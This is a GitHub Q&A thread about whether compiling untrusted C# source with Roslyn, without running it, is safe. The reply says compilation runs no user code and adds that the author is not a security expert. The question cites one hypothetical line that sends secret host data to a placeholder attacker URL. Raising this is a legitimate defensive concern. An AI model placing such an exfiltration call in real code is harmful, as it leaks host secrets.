### DISCUSSION TITLE
Question: Is compiling (not executing) arbitrary user code secure?

### DISCUSSION THREAD

**Discussion by dave-yotta** [dotnet/roslyn#56347] [Q&A]
### Question

Is it possible for some bad actor to write `sourceCode` which can exploit some vulnerability when calling e.g. `CSharpCompilation.CreateScriptCompilation("user code", SyntaxFactory.ParseSyntaxTree(sourceCode))`?

I'm thinking along the lines of deliberately executed code, e.g. a roslyn `DiagnosticAnalyzer` with a `HttpClient.Send(secretHostData, "http://badactor.com/slurp")` as part of `sourceCode`.

### Context
This is related to a kind of C# lambda service we provide within our application, which I have (in PR) moved out of process for resource segregation and security (we currently take a syntax whitelisting approach but this is not very provably secure).

However, the roslyn compiler loads ~1gb of ram on linux, so I am thinking about having one central hub process for compilation, and the existing appropriately sandboxed processes only for execution.  I'm concerned about the process in which the compiler runs having access to other users `sourceCode`, and any other host vulnerability in that process.

**Comment by svick** [comment]
I believe compiling untrusted source code should be safe. The command-line compiler (csc) does execute user code during compilation (namely, analyzers and source generators), but that code has to have been previously compiled and passed to the compiler as a DLL using the `-analyzer` option. If you're using the Roslyn API, then you would have to run that user code explicitly (e.g. using `GeneratorDriver`). So your approach should not result in any user code being run.

This of course assumes that Roslyn contains no security bugs.

Note that I'm not a security expert or Microsoft employee, so don't take this as any kind of authoritative answer.
